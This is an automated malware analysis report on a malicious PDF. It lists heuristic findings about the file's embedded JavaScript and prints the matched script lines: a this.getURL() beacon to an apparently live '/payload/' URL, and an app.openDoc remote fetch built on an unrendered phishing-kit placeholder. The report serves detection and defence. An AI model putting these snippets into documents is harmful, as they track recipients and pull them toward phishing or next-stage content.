Malicious PDF — malware analysis report

Heuristics 7

• JavaScript action low 4 related findings PDF_JAVASCRIPT
  PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
• Embedded JS stream low PDF_JS
  PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
• PDF JavaScript issues an HTTP request on open low PDF_JS_NETWORK_BEACON
  Embedded JavaScript calls a network API — this.getURL() to an http(s) URL, XMLHttpRequest, or SOAP — typically an open-time beacon / tracking pixel or data-exfil callback. This abuses a legitimate Acrobat API and exploits no vulnerability; the risk is the unsolicited outbound request (confirming recipient open or fetching a next stage).
  Matched line in script

      f.value = "1";
      this.getURL("https://mail-ibs.ru/payload/openAttache/afa92fc44ec68d1ce62b4a1701af227ded632a54eb6b7d31413feb314467d174/image.png", false);
  }

• PDF JavaScript opens or fetches a remote URL/document low PDF_JS_REMOTE_DOC_FETCH
  Embedded JavaScript calls app.openDoc() against a remote filesystem (cFS:'CHTTP'/'CFTP') or app.launchURL() to open an external / base64-encoded URL. This is the JS-driven remote-document / phishing-redirect technique — distinct from a /Launch file dropper. It exploits no CVE; the risk is where the URL leads.
  Matched line in script

  var url = encodeURI("{SYSLINK}");
  app.openDoc({cPath: url, cFS: "CHTTP"});
  if (!this.getField("trackerFlag")) {

• PDF JavaScript contains an unrendered phishing-kit placeholder low PDF_JS_TEMPLATE_PLACEHOLDER
  Embedded JavaScript still contains an unrendered template / mail-merge placeholder (e.g. {SYSLINK}, {{recipient}}, '[[-Email-]]'). A delivered document has these substituted; an unrendered token means the file IS the phishing-kit template whose per-recipient URL / personalisation never ran. Complements PDF_URL_MAILMERGE_PLACEHOLDER, which only inspects annotation URIs.
  Matched line in script

  var url = encodeURI("{SYSLINK}");
  app.openDoc({cPath: url, cFS: "CHTTP"});

• PDF paints image(s) but contains no text operators info PDF_IMAGE_ONLY_LURE
  PDF has 1 image XObject(s) and the content stream contains no text-emitting operators (BT/ET, Tj, TJ, ', ") in either raw bytes or decompressed streams — this is the screenshot-as-PDF pattern used to bypass text-based scanners and to deliver instructions purely through rendered pixels. It is informational unless paired with invisible links or risky URI context.
• Embedded URL info EMBEDDED_URL
  One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL https://mail-ibs.ru/payload/openAttache/afa92fc44ec68d1ce62b4a1701af227ded632a54eb6b7d31413feb314467d174/image.png Referenced by PDF JavaScript

  • http://www.w3.org/1999/02/22-rdf-syntax-ns#Referenced by PDF JavaScript
  • http://ns.adobe.com/xap/1.0/Referenced by PDF JavaScript
  • http://purl.org/dc/elements/1.1/Referenced by PDF JavaScript
  • http://ns.adobe.com/xap/1.0/mm/Referenced by PDF JavaScript
  • http://ns.adobe.com/pdf/1.3/Referenced by PDF JavaScript

Open this report in the interactive analyzer, or submit your own file for analysis.